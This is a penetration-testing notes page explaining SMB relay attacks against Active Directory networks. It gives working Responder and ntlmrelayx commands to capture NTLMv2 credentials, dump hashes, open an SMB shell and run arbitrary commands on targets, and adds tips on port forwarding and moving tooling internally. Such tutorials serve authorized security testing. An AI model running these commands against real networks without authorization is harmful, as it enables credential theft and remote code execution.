Skip to main content

SMB Relay

Note: Network Environment

This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments.

What is SMB Relay?

A man-in-the-middle may receive user NTLM authentication credentials, which, once received, can be relayed to other host(s) on the network in an attempt to authenticate as said user(s).

What's the Flaw?

Many Active Directory networks are configured in such a way that SMB message signing is not enabled -- which is the default configuration on client machines. It is always enabled on servers and domain controllers.

Detecting SMB Signing Mode

sudo nmap --script=smb2-security-mode -p445 target(s)

How is it Exploited?

Using a tool like responder, the attacker can listen for SMB client requests. If a client connects, the attacker will receive the user's NTLMv2 authentication credential -- username and NTMLv2 hash in cleartext.

Upon receiving the NTLMv2 authentication credential, the attacker can use a tool like ntlmrelayx.py to relay that credential to other host(s) on the network and attempt to authenticate as this user -- assuming this user is privileged to access resources on the other machines.

 

The Attack

Internal

Part 1: Responder

Various responder modules can be enabled/disabled in the configuration file: /etc/responder/Responder.conf

  • Disable HTTP server (hosted by ntlmrelay)
  • Disable SMB server (hosted by ntlmrelay)
sudo responder -I <interface-name> -dvw


Part 2a: ntlmrelayx (dump hashes)

The Kali Linux developers have created a series of wrappers around Impacket scripts. In this case, you can easily invoke ntlmrelayx.py by running impacket-ntlmrelayx

sudo ntlmrelayx.py -tf <targets-file> -smb2support


Part 2b: ntlmrelayx (bind shell)

Opens an SMB shell that is forwared through a socket on localhost

sudo ntlmrelayx.py -tf <targets-file> -smb2support -i

Once the shell is established, just use netcat to connect to the socket

nc 127.0.0.1 <port>

Then, we can issue commands to the SMB shell established on the target


Part 2c: ntlmrelayx (RCE)

sudo ntlmrelayx.py -tf <targets-file> -smb2support -c 'command'


 

External

Port Forwarding

To carry out this attack on an external assessment will require some extensive port forwarding and proxying. Effectively, the goal is to:

  1. Redirect the SMB authentication traffic from the receiving host to responder listening on the attacker's hox
  2. Relay the SMB authentication back through a SOCKS proxy or port redirection to a target IP

Transfer Tooling Internally

Another option during an internal assessment is to transfer tooling internally and run said tooling on hosts within the network.

  • If Python is installed on the target, could potentially use Responder and Impacket on the target
  • Could also consider Inveigh to run tooling with similar capabilities via PowerShell
  • Potentially other tooling
Back to top